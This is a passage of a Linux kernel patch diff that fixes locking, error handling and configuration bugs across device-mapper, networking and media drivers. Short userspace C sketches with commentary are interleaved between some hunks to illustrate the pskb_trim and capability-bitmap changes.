+ 					  sector_t origin_size,
+ 					  sector_t cache_block_size)
+ {
+-	return __smq_create(cache_size, origin_size, cache_block_size, false, true);
++	return __smq_create(cache_size, origin_size, cache_block_size,
++			    false, true, false);
+ }
+ 
+ static struct dm_cache_policy *mq_create(dm_cblock_t cache_size,
+ 					 sector_t origin_size,
+ 					 sector_t cache_block_size)
+ {
+-	return __smq_create(cache_size, origin_size, cache_block_size, true, true);
++	return __smq_create(cache_size, origin_size, cache_block_size,
++			    true, true, false);
+ }
+ 
+ static struct dm_cache_policy *cleaner_create(dm_cblock_t cache_size,
+ 					      sector_t origin_size,
+ 					      sector_t cache_block_size)
+ {
+-	return __smq_create(cache_size, origin_size, cache_block_size, false, false);
++	return __smq_create(cache_size, origin_size, cache_block_size,
++			    false, false, true);
+ }
+ 
+ /*----------------------------------------------------------------*/
+diff --git a/drivers/md/dm-raid.c b/drivers/md/dm-raid.c
+index b26c12856b1db..4b7528dc2fd08 100644
+--- a/drivers/md/dm-raid.c
++++ b/drivers/md/dm-raid.c
+@@ -3254,8 +3254,7 @@ size_check:
+ 	r = md_start(&rs->md);
+ 	if (r) {
+ 		ti->error = "Failed to start raid array";
+-		mddev_unlock(&rs->md);
+-		goto bad_md_start;
++		goto bad_unlock;
+ 	}
+ 
+ 	/* If raid4/5/6 journal mode explicitly requested (only possible with journal dev) -> set it */
+@@ -3263,8 +3262,7 @@ size_check:
+ 		r = r5c_journal_mode_set(&rs->md, rs->journal_dev.mode);
+ 		if (r) {
+ 			ti->error = "Failed to set raid4/5/6 journal mode";
+-			mddev_unlock(&rs->md);
+-			goto bad_journal_mode_set;
++			goto bad_unlock;
+ 		}
+ 	}
+ 
+@@ -3275,14 +3273,14 @@ size_check:
+ 	if (rs_is_raid456(rs)) {
+ 		r = rs_set_raid456_stripe_cache(rs);
+ 		if (r)
+-			goto bad_stripe_cache;
++			goto bad_unlock;
+ 	}
+ 
+ 	/* Now do an early reshape check */
+ 	if (test_bit(RT_FLAG_RESHAPE_RS, &rs->runtime_flags)) {
+ 		r = rs_check_reshape(rs);
+ 		if (r)
+-			goto bad_check_reshape;
++			goto bad_unlock;
+ 
+ 		/* Restore new, ctr requested layout to perform check */
+ 		rs_config_restore(rs, &rs_layout);
+@@ -3291,7 +3289,7 @@ size_check:
+ 			r = rs->md.pers->check_reshape(&rs->md);
+ 			if (r) {
+ 				ti->error = "Reshape check failed";
+-				goto bad_check_reshape;
++				goto bad_unlock;
+ 			}
+ 		}
+ 	}
+@@ -3302,11 +3300,9 @@ size_check:
+ 	mddev_unlock(&rs->md);
+ 	return 0;
+ 
+-bad_md_start:
+-bad_journal_mode_set:
+-bad_stripe_cache:
+-bad_check_reshape:
++bad_unlock:
+ 	md_stop(&rs->md);
++	mddev_unlock(&rs->md);
+ bad:
+ 	raid_set_free(rs);
+ 
+@@ -3317,7 +3313,9 @@ static void raid_dtr(struct dm_target *ti)
+ {
+ 	struct raid_set *rs = ti->private;
+ 
++	mddev_lock_nointr(&rs->md);
+ 	md_stop(&rs->md);
++	mddev_unlock(&rs->md);
+ 	raid_set_free(rs);
+ }
+ 
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 829e1bd9bcbf9..45daba0eb9310 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -6269,6 +6269,8 @@ static void __md_stop(struct mddev *mddev)
+ 
+ void md_stop(struct mddev *mddev)
+ {
++	lockdep_assert_held(&mddev->reconfig_mutex);
++
+ 	/* stop the array and free an attached data structures.
+ 	 * This is called from dm-raid
+ 	 */
+diff --git a/drivers/media/platform/amphion/vpu_core.c b/drivers/media/platform/amphion/vpu_core.c
+index f9ec1753f7c86..be80410682681 100644
+--- a/drivers/media/platform/amphion/vpu_core.c
++++ b/drivers/media/platform/amphion/vpu_core.c
+@@ -828,7 +828,7 @@ static const struct dev_pm_ops vpu_core_pm_ops = {
+ 
+ static struct vpu_core_resources imx8q_enc = {
+ 	.type = VPU_CORE_TYPE_ENC,
+-	.fwname = "vpu/vpu_fw_imx8_enc.bin",
++	.fwname = "amphion/vpu/vpu_fw_imx8_enc.bin",
+ 	.stride = 16,
+ 	.max_width = 1920,
+ 	.max_height = 1920,
+@@ -843,7 +843,7 @@ static struct vpu_core_resources imx8q_enc = {
+ 
+ static struct vpu_core_resources imx8q_dec = {
+ 	.type = VPU_CORE_TYPE_DEC,
+-	.fwname = "vpu/vpu_fw_imx8_dec.bin",
++	.fwname = "amphion/vpu/vpu_fw_imx8_dec.bin",
+ 	.stride = 256,
+ 	.max_width = 8188,
+ 	.max_height = 8188,
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 91d84df91123b..576370f89c755 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1512,6 +1512,11 @@ static void bond_setup_by_slave(struct net_device *bond_dev,
+ 
+ 	memcpy(bond_dev->broadcast, slave_dev->broadcast,
+ 		slave_dev->addr_len);
++
++	if (slave_dev->flags & IFF_POINTOPOINT) {
++		bond_dev->flags &= ~(IFF_BROADCAST | IFF_MULTICAST);
++		bond_dev->flags |= (IFF_POINTOPOINT | IFF_NOARP);
++	}
+ }
+ 
+ /* On bonding slaves other than the currently active slave, suppress
+diff --git a/drivers/net/can/usb/gs_usb.c b/drivers/net/can/usb/gs_usb.c
+index fe532d5048897..5858cbafbc965 100644
+--- a/drivers/net/can/usb/gs_usb.c
++++ b/drivers/net/can/usb/gs_usb.c
+@@ -989,6 +989,8 @@ static int gs_can_close(struct net_device *netdev)
+ 	usb_kill_anchored_urbs(&dev->tx_submitted);
+ 	atomic_set(&dev->active_tx_urbs, 0);
+ 
++	dev->can.state = CAN_STATE_STOPPED;
++
+ 	/* reset the device */
+ 	rc = gs_cmd_reset(dev);
+ 	if (rc < 0)
+diff --git a/drivers/net/dsa/qca/qca8k-common.c b/drivers/net/dsa/qca/qca8k-common.c
+index fb45b598847be..7c3dd71a81bd8 100644
+--- a/drivers/net/dsa/qca/qca8k-common.c
++++ b/drivers/net/dsa/qca/qca8k-common.c
+@@ -281,7 +281,7 @@ void qca8k_fdb_flush(struct qca8k_priv *priv)
+ }
+ 
+ static int qca8k_fdb_search_and_insert(struct qca8k_priv *priv, u8 port_mask,
+-				       const u8 *mac, u16 vid)
++				       const u8 *mac, u16 vid, u8 aging)
+ {
+ 	struct qca8k_fdb fdb = { 0 };
+ 	int ret;
+@@ -298,10 +298,12 @@ static int qca8k_fdb_search_and_insert(struct qca8k_priv *priv, u8 port_mask,
+ 		goto exit;
+ 
+ 	/* Rule exist. Delete first */
+-	if (!fdb.aging) {
++	if (fdb.aging) {
+ 		ret = qca8k_fdb_access(priv, QCA8K_FDB_PURGE, -1);
+ 		if (ret)
+ 			goto exit;
++	} else {
++		fdb.aging = aging;
+ 	}
+ 
+ 	/* Add port to fdb portmask */
+@@ -328,6 +330,10 @@ static int qca8k_fdb_search_and_del(struct qca8k_priv *priv, u8 port_mask,
+ 	if (ret < 0)
+ 		goto exit;
+ 
++	ret = qca8k_fdb_read(priv, &fdb);
++	if (ret < 0)
++		goto exit;
++
+ 	/* Rule doesn't exist. Why delete? */
+ 	if (!fdb.aging) {
+ 		ret = -EINVAL;
+@@ -847,7 +853,11 @@ int qca8k_port_mdb_add(struct dsa_switch *ds, int port,
+ 	const u8 *addr = mdb->addr;
+ 	u16 vid = mdb->vid;
+ 
+-	return qca8k_fdb_search_and_insert(priv, BIT(port), addr, vid);
++	if (!vid)
++		vid = QCA8K_PORT_VID_DEF;
++
++	return qca8k_fdb_search_and_insert(priv, BIT(port), addr, vid,
++					   QCA8K_ATU_STATUS_STATIC);
+ }
+ 
+ int qca8k_port_mdb_del(struct dsa_switch *ds, int port,
+@@ -858,6 +868,9 @@ int qca8k_port_mdb_del(struct dsa_switch *ds, int port,
+ 	const u8 *addr = mdb->addr;
+ 	u16 vid = mdb->vid;
+ 
++	if (!vid)
++		vid = QCA8K_PORT_VID_DEF;
++
+ 	return qca8k_fdb_search_and_del(priv, BIT(port), addr, vid);
+ }
+ 
+diff --git a/drivers/net/ethernet/atheros/atl1e/atl1e_main.c b/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
+index 5db0f3495a32e..5935be190b9e2 100644
+--- a/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
++++ b/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
+@@ -1641,8 +1641,11 @@ static int atl1e_tso_csum(struct atl1e_adapter *adapter,
+ 			real_len = (((unsigned char *)ip_hdr(skb) - skb->data)
+ 					+ ntohs(ip_hdr(skb)->tot_len));
+ 
+-			if (real_len < skb->len)
+-				pskb_trim(skb, real_len);
++			if (real_len < skb->len) {
++				err = pskb_trim(skb, real_len);
++				if (err)
++					return err;
++			}
+ 
+ 			hdr_len = skb_tcp_all_headers(skb);
+ 			if (unlikely(skb->len == hdr_len)) {
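Both atl1e and atl1 (next hunk) stop ignoring pskb_trim() failures. A small userspace model of the error-checked trim, with trim_buf as a hypothetical stand-in for pskb_trim(), which can fail for nonlinear skbs in the kernel:

/* Shrink a buffer to the length the header claims and propagate failure. */
#include <errno.h>
#include <stdio.h>

struct buf { unsigned int len; };

static int trim_buf(struct buf *b, unsigned int new_len)
{
	if (new_len > b->len)
		return -EINVAL;	/* pskb_trim() can also fail; never ignore it */
	b->len = new_len;
	return 0;
}

int main(void)
{
	struct buf skb = { .len = 100 };
	unsigned int real_len = 60;	/* e.g. ntohs(tot_len) + header offset */
	int err;

	if (real_len < skb.len) {
		err = trim_buf(&skb, real_len);
		if (err)
			return 1;	/* drop the frame instead of sending junk */
	}
	printf("len after trim: %u\n", skb.len);
	return 0;
}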
+diff --git a/drivers/net/ethernet/atheros/atlx/atl1.c b/drivers/net/ethernet/atheros/atlx/atl1.c
+index c8444bcdf5270..02aa6fd8ebc2d 100644
+--- a/drivers/net/ethernet/atheros/atlx/atl1.c
++++ b/drivers/net/ethernet/atheros/atlx/atl1.c
+@@ -2113,8 +2113,11 @@ static int atl1_tso(struct atl1_adapter *adapter, struct sk_buff *skb,
+ 
+ 			real_len = (((unsigned char *)iph - skb->data) +
+ 				ntohs(iph->tot_len));
+-			if (real_len < skb->len)
+-				pskb_trim(skb, real_len);
++			if (real_len < skb->len) {
++				err = pskb_trim(skb, real_len);
++				if (err)
++					return err;
++			}
+ 			hdr_len = skb_tcp_all_headers(skb);
+ 			if (skb->len == hdr_len) {
+ 				iph->check = 0;
+diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c
+index 5d39df8452653..b12152e2fca0a 100644
+--- a/drivers/net/ethernet/emulex/benet/be_main.c
++++ b/drivers/net/ethernet/emulex/benet/be_main.c
+@@ -1139,7 +1139,8 @@ static struct sk_buff *be_lancer_xmit_workarounds(struct be_adapter *adapter,
+ 	    (lancer_chip(adapter) || BE3_chip(adapter) ||
+ 	     skb_vlan_tag_present(skb)) && is_ipv4_pkt(skb)) {
+ 		ip = (struct iphdr *)ip_hdr(skb);
+-		pskb_trim(skb, eth_hdr_len + ntohs(ip->tot_len));
++		if (unlikely(pskb_trim(skb, eth_hdr_len + ntohs(ip->tot_len))))
++			goto tx_drop;
+ 	}
+ 
+ 	/* If vlan tag is already inlined in the packet, skip HW VLAN
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hnae3.h b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+index 17137de9338cf..fcb8b6dc5ab92 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hnae3.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+@@ -31,6 +31,7 @@
+ #include <linux/pci.h>
+ #include <linux/pkt_sched.h>
+ #include <linux/types.h>
++#include <linux/bitmap.h>
+ #include <net/pkt_cls.h>
+ 
+ #define HNAE3_MOD_VERSION "1.0"
+@@ -402,7 +403,7 @@ struct hnae3_ae_dev {
+ 	unsigned long hw_err_reset_req;
+ 	struct hnae3_dev_specs dev_specs;
+ 	u32 dev_version;
+-	unsigned long caps[BITS_TO_LONGS(HNAE3_DEV_CAPS_MAX_NUM)];
++	DECLARE_BITMAP(caps, HNAE3_DEV_CAPS_MAX_NUM);
+ 	void *priv;
+ };
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
+index c797d54f98caa..2ccb0f5460797 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
+@@ -170,6 +170,20 @@ static const struct hclge_comm_caps_bit_map hclge_vf_cmd_caps[] = {
+ 	{HCLGE_COMM_CAP_GRO_B, HNAE3_DEV_SUPPORT_GRO_B},
+ };
+ 
++static void
++hclge_comm_capability_to_bitmap(unsigned long *bitmap, __le32 *caps)
++{
++	const unsigned int words = HCLGE_COMM_QUERY_CAP_LENGTH;
++	u32 val[HCLGE_COMM_QUERY_CAP_LENGTH];
++	unsigned int i;
++
++	for (i = 0; i < words; i++)
++		val[i] = __le32_to_cpu(caps[i]);
++
++	bitmap_from_arr32(bitmap, val,
++			  HCLGE_COMM_QUERY_CAP_LENGTH * BITS_PER_TYPE(u32));
++}
++
+ static void
+ hclge_comm_parse_capability(struct hnae3_ae_dev *ae_dev, bool is_pf,
+ 			    struct hclge_comm_query_version_cmd *cmd)
+@@ -178,11 +192,12 @@ hclge_comm_parse_capability(struct hnae3_ae_dev *ae_dev, bool is_pf,
+ 				is_pf ? hclge_pf_cmd_caps : hclge_vf_cmd_caps;
+ 	u32 size = is_pf ? ARRAY_SIZE(hclge_pf_cmd_caps) :
+ 				ARRAY_SIZE(hclge_vf_cmd_caps);
+-	u32 caps, i;
++	DECLARE_BITMAP(caps, HCLGE_COMM_QUERY_CAP_LENGTH * BITS_PER_TYPE(u32));
++	u32 i;
+ 
+-	caps = __le32_to_cpu(cmd->caps[0]);
++	hclge_comm_capability_to_bitmap(caps, cmd->caps);
+ 	for (i = 0; i < size; i++)
+-		if (hnae3_get_bit(caps, caps_map[i].imp_bit))
++		if (test_bit(caps_map[i].imp_bit, caps))
+ 			set_bit(caps_map[i].local_bit, ae_dev->caps);
+ }
+ 
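The helper above widens capability parsing from one u32 word to the whole array by converting it into a long bitmap. A self-contained model of that conversion, assuming 64-bit longs and skipping the __le32 handling the kernel helper performs first:

/* Userspace sketch of the u32-array -> unsigned-long-bitmap conversion
 * done by bitmap_from_arr32() above; assumes 64-bit longs. */
#include <stdio.h>

#define CAP_WORDS 3			/* like HCLGE_COMM_QUERY_CAP_LENGTH */

static void bitmap_from_u32_array(unsigned long *bitmap,
				  const unsigned int *words, int nwords)
{
	for (int i = 0; i < nwords; i++) {
		int idx = i / 2;	/* two u32 words per 64-bit long */
		if (i % 2)
			bitmap[idx] |= (unsigned long)words[i] << 32;
		else
			bitmap[idx] = words[i];
	}
}

int main(void)
{
	unsigned int caps[CAP_WORDS] = { 0x5, 0x0, 0x1 };	/* bits 0, 2, 64 */
	unsigned long bm[(CAP_WORDS + 1) / 2] = { 0 };

	bitmap_from_u32_array(bm, caps, CAP_WORDS);
	/* test_bit() equivalent for bit 64: */
	printf("bit 64 set: %d\n", (int)(bm[1] & 1));
	return 0;
}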
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
+index c4aded65e848b..09362823140d5 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
+@@ -52,7 +52,10 @@ static void hclge_tm_info_to_ieee_ets(struct hclge_dev *hdev,
+ 
+ 	for (i = 0; i < HNAE3_MAX_TC; i++) {
+ 		ets->prio_tc[i] = hdev->tm_info.prio_tc[i];
+-		ets->tc_tx_bw[i] = hdev->tm_info.pg_info[0].tc_dwrr[i];
++		if (i < hdev->tm_info.num_tc)
++			ets->tc_tx_bw[i] = hdev->tm_info.pg_info[0].tc_dwrr[i];
++		else
++			ets->tc_tx_bw[i] = 0;
+ 
+ 		if (hdev->tm_info.tc_info[i].tc_sch_mode ==
+ 		    HCLGE_SCH_MODE_SP)
+@@ -123,7 +126,8 @@ static u8 hclge_ets_tc_changed(struct hclge_dev *hdev, struct ieee_ets *ets,
+ }
+ 
+ static int hclge_ets_sch_mode_validate(struct hclge_dev *hdev,
+-				       struct ieee_ets *ets, bool *changed)
++				       struct ieee_ets *ets, bool *changed,
++				       u8 tc_num)
+ {
+ 	bool has_ets_tc = false;
+ 	u32 total_ets_bw = 0;
+@@ -137,6 +141,13 @@ static int hclge_ets_sch_mode_validate(struct hclge_dev *hdev,
+ 				*changed = true;
+ 			break;
+ 		case IEEE_8021QAZ_TSA_ETS:
++			if (i >= tc_num) {
++				dev_err(&hdev->pdev->dev,
++					"tc%u is disabled, cannot set ets bw\n",
++					i);
++				return -EINVAL;
++			}
++
+ 			/* The hardware will switch to sp mode if bandwidth is
+ 			 * 0, so the ets bandwidth limit must be greater than 0.
+ 			 */
+@@ -176,7 +187,7 @@ static int hclge_ets_validate(struct hclge_dev *hdev, struct ieee_ets *ets,
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = hclge_ets_sch_mode_validate(hdev, ets, changed);
++	ret = hclge_ets_sch_mode_validate(hdev, ets, changed, tc_num);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+index 0ebc21401b7c2..726062e512939 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+@@ -692,8 +692,7 @@ static int hclge_dbg_dump_tc(struct hclge_dev *hdev, char *buf, int len)
+ 	for (i = 0; i < HNAE3_MAX_TC; i++) {
+ 		sch_mode_str = ets_weight->tc_weight[i] ? "dwrr" : "sp";
+ 		pos += scnprintf(buf + pos, len - pos, "%u     %4s    %3u\n",
+-				 i, sch_mode_str,
+-				 hdev->tm_info.pg_info[0].tc_dwrr[i]);
++				 i, sch_mode_str, ets_weight->tc_weight[i]);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+index 922c0da3660c7..150f146fa24fb 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+@@ -785,6 +785,7 @@ static void hclge_tm_tc_info_init(struct hclge_dev *hdev)
+ static void hclge_tm_pg_info_init(struct hclge_dev *hdev)
+ {
+ #define BW_PERCENT	100
++#define DEFAULT_BW_WEIGHT	1
+ 
+ 	u8 i;
+ 
+@@ -806,7 +807,7 @@ static void hclge_tm_pg_info_init(struct hclge_dev *hdev)
+ 		for (k = 0; k < hdev->tm_info.num_tc; k++)
+ 			hdev->tm_info.pg_info[i].tc_dwrr[k] = BW_PERCENT;
+ 		for (; k < HNAE3_MAX_TC; k++)
+-			hdev->tm_info.pg_info[i].tc_dwrr[k] = 0;
++			hdev->tm_info.pg_info[i].tc_dwrr[k] = DEFAULT_BW_WEIGHT;
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+index 9954493cd4489..62497f5565c59 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+@@ -1839,7 +1839,7 @@ void i40e_dbg_pf_exit(struct i40e_pf *pf)
+ void i40e_dbg_init(void)
+ {
+ 	i40e_dbg_root = debugfs_create_dir(i40e_driver_name, NULL);
+-	if (!i40e_dbg_root)
++	if (IS_ERR(i40e_dbg_root))
+ 		pr_info("init of debugfs failed\n");
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index c1f91c55e1ca7..22bc57ee24228 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -3286,9 +3286,6 @@ static void iavf_adminq_task(struct work_struct *work)
+ 	u32 val, oldval;
+ 	u16 pending;
+ 
+-	if (adapter->flags & IAVF_FLAG_PF_COMMS_FAILED)
+-		goto out;
+-
+ 	if (!mutex_trylock(&adapter->crit_lock)) {
+ 		if (adapter->state == __IAVF_REMOVE)
+ 			return;
+@@ -3297,10 +3294,13 @@ static void iavf_adminq_task(struct work_struct *work)
+ 		goto out;
+ 	}
+ 
++	if (adapter->flags & IAVF_FLAG_PF_COMMS_FAILED)
++		goto unlock;
++
+ 	event.buf_len = IAVF_MAX_AQ_BUF_SIZE;
+ 	event.msg_buf = kzalloc(event.buf_len, GFP_KERNEL);
+ 	if (!event.msg_buf)
+-		goto out;
++		goto unlock;
+ 
+ 	do {
+ 		ret = iavf_clean_arq_element(hw, &event, &pending);
+@@ -3315,7 +3315,6 @@ static void iavf_adminq_task(struct work_struct *work)
+ 		if (pending != 0)
+ 			memset(event.msg_buf, 0, IAVF_MAX_AQ_BUF_SIZE);
+ 	} while (pending);
+-	mutex_unlock(&adapter->crit_lock);
+ 
+ 	if (iavf_is_reset_in_progress(adapter))
+ 		goto freedom;
+@@ -3359,6 +3358,8 @@ static void iavf_adminq_task(struct work_struct *work)
+ 
+ freedom:
+ 	kfree(event.msg_buf);
++unlock:
++	mutex_unlock(&adapter->crit_lock);
+ out:
+ 	/* re-enable Admin queue interrupt cause */
+ 	iavf_misc_irq_enable(adapter);
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c b/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
+index ead6d50fc0adc..8c6e13f87b7d3 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
+@@ -1281,16 +1281,21 @@ ice_cfg_fdir_xtrct_seq(struct ice_pf *pf, struct ethtool_rx_flow_spec *fsp,
+ 				     ICE_FLOW_FLD_OFF_INVAL);
+ 	}
+ 
+-	/* add filter for outer headers */
+ 	fltr_idx = ice_ethtool_flow_to_fltr(fsp->flow_type & ~FLOW_EXT);
++
++	assign_bit(fltr_idx, hw->fdir_perfect_fltr, perfect_filter);
++
++	/* add filter for outer headers */
+ 	ret = ice_fdir_set_hw_fltr_rule(pf, seg, fltr_idx,
+ 					ICE_FD_HW_SEG_NON_TUN);
+-	if (ret == -EEXIST)
+-		/* Rule already exists, free memory and continue */
+-		devm_kfree(dev, seg);
+-	else if (ret)
++	if (ret == -EEXIST) {
++		/* Rule already exists, free memory and count as success */
++		ret = 0;
++		goto err_exit;
++	} else if (ret) {
+ 		/* could not write filter, free memory */
+ 		goto err_exit;
++	}
+ 
+ 	/* make tunneled filter HW entries if possible */
+ 	memcpy(&tun_seg[1], seg, sizeof(*seg));
+@@ -1305,18 +1310,13 @@ ice_cfg_fdir_xtrct_seq(struct ice_pf *pf, struct ethtool_rx_flow_spec *fsp,
+ 		devm_kfree(dev, tun_seg);
+ 	}
+ 
+-	if (perfect_filter)
+-		set_bit(fltr_idx, hw->fdir_perfect_fltr);
+-	else
+-		clear_bit(fltr_idx, hw->fdir_perfect_fltr);
+-
+ 	return ret;
+ 
+ err_exit:
+ 	devm_kfree(dev, tun_seg);
+ 	devm_kfree(dev, seg);
+ 
+-	return -EOPNOTSUPP;
++	return ret;
+ }
+ 
+ /**
+@@ -1914,7 +1914,9 @@ int ice_add_fdir_ethtool(struct ice_vsi *vsi, struct ethtool_rxnfc *cmd)
+ 	input->comp_report = ICE_FXD_FLTR_QW0_COMP_REPORT_SW_FAIL;
+ 
+ 	/* input struct is added to the HW filter list */
+-	ice_fdir_update_list_entry(pf, input, fsp->location);
++	ret = ice_fdir_update_list_entry(pf, input, fsp->location);
++	if (ret)
++		goto release_lock;
+ 
+ 	ret = ice_fdir_write_all_fltr(pf, input, true);
+ 	if (ret)
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 2e091a4a065e7..d877dc0f87f71 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -317,6 +317,33 @@ static void igc_clean_all_tx_rings(struct igc_adapter *adapter)
+ 			igc_clean_tx_ring(adapter->tx_ring[i]);
+ }
+ 
++static void igc_disable_tx_ring_hw(struct igc_ring *ring)
++{
++	struct igc_hw *hw = &ring->q_vector->adapter->hw;
++	u8 idx = ring->reg_idx;
++	u32 txdctl;
++
++	txdctl = rd32(IGC_TXDCTL(idx));
++	txdctl &= ~IGC_TXDCTL_QUEUE_ENABLE;
++	txdctl |= IGC_TXDCTL_SWFLUSH;
++	wr32(IGC_TXDCTL(idx), txdctl);
++}
++
++/**
++ * igc_disable_all_tx_rings_hw - Disable all transmit queue operation
++ * @adapter: board private structure
++ */
++static void igc_disable_all_tx_rings_hw(struct igc_adapter *adapter)
++{
++	int i;
++
++	for (i = 0; i < adapter->num_tx_queues; i++) {
++		struct igc_ring *tx_ring = adapter->tx_ring[i];
++
++		igc_disable_tx_ring_hw(tx_ring);
++	}
++}
++
+ /**
+  * igc_setup_tx_resources - allocate Tx resources (Descriptors)
+  * @tx_ring: tx descriptor ring (for a specific queue) to setup
+@@ -5026,6 +5053,7 @@ void igc_down(struct igc_adapter *adapter)
+ 	/* clear VLAN promisc flag so VFTA will be updated if necessary */
+ 	adapter->flags &= ~IGC_FLAG_VLAN_PROMISC;
+ 
++	igc_disable_all_tx_rings_hw(adapter);
+ 	igc_clean_all_tx_rings(adapter);
+ 	igc_clean_all_rx_rings(adapter);
+ }
+@@ -7124,18 +7152,6 @@ void igc_enable_rx_ring(struct igc_ring *ring)
+ 		igc_alloc_rx_buffers(ring, igc_desc_unused(ring));
+ }
+ 
+-static void igc_disable_tx_ring_hw(struct igc_ring *ring)
+-{
+-	struct igc_hw *hw = &ring->q_vector->adapter->hw;
+-	u8 idx = ring->reg_idx;
+-	u32 txdctl;
+-
+-	txdctl = rd32(IGC_TXDCTL(idx));
+-	txdctl &= ~IGC_TXDCTL_QUEUE_ENABLE;
+-	txdctl |= IGC_TXDCTL_SWFLUSH;
+-	wr32(IGC_TXDCTL(idx), txdctl);
+-}
+-
+ void igc_disable_tx_ring(struct igc_ring *ring)
+ {
+ 	igc_disable_tx_ring_hw(ring);
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 9b8848daeb430..6105419ae2d5f 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -8499,7 +8499,7 @@ static void ixgbe_atr(struct ixgbe_ring *ring,
+ 		struct ixgbe_adapter *adapter = q_vector->adapter;
+ 
+ 		if (unlikely(skb_tail_pointer(skb) < hdr.network +
+-			     VXLAN_HEADROOM))
++			     vxlan_headroom(0)))
+ 			return;
+ 
+ 		/* verify the port is recognized as VXLAN */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index 3b0a66c0977a7..34fa59575fa91 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -203,10 +203,8 @@ void npc_config_secret_key(struct rvu *rvu, int blkaddr)
+ 	struct rvu_hwinfo *hw = rvu->hw;
+ 	u8 intf;
+ 
+-	if (!hwcap->npc_hash_extract) {
+-		dev_info(rvu->dev, "HW does not support secret key configuration\n");
++	if (!hwcap->npc_hash_extract)
+ 		return;
+-	}
+ 
+ 	for (intf = 0; intf < hw->npc_intfs; intf++) {
+ 		rvu_write64(rvu, blkaddr, NPC_AF_INTFX_SECRET_KEY0(intf),
+@@ -220,15 +218,54 @@ void npc_config_secret_key(struct rvu *rvu, int blkaddr)
+ 
+ void npc_program_mkex_hash(struct rvu *rvu, int blkaddr)
+ {
++	struct npc_mcam_kex_hash *mh = rvu->kpu.mkex_hash;
+ 	struct hw_cap *hwcap = &rvu->hw->cap;
++	u8 intf, ld, hdr_offset, byte_len;
+ 	struct rvu_hwinfo *hw = rvu->hw;
+-	u8 intf;
++	u64 cfg;
+ 
+-	if (!hwcap->npc_hash_extract) {
+-		dev_dbg(rvu->dev, "Field hash extract feature is not supported\n");
++	/* Check if hardware supports hash extraction */
++	if (!hwcap->npc_hash_extract)
+ 		return;
++
++	/* Check if hashing of the IPv6 source/destination
++	 * address should be enabled.
++	 * Hashing reduces the 128-bit SIP/DIP fields to 32 bits
++	 * so that the 224-bit X2 key can be used for IPv6-based filters as
++	 * well, which in turn makes more MCAM entries available for use.
++	 *
++	 * Hashing of the IPv6 SIP/DIP is enabled in the below scenarios:
++	 * 1. The silicon variant supports the hashing feature.
++	 * 2. The number of bytes of the IP address being extracted is 4
++	 *    (i.e. 32 bits). The assumption here is that if the user wants
++	 *    the 8 LSB bytes of the IP address, or the full 16 bytes, the
++	 *    intention is not to use the 32-bit hash.
++	 */
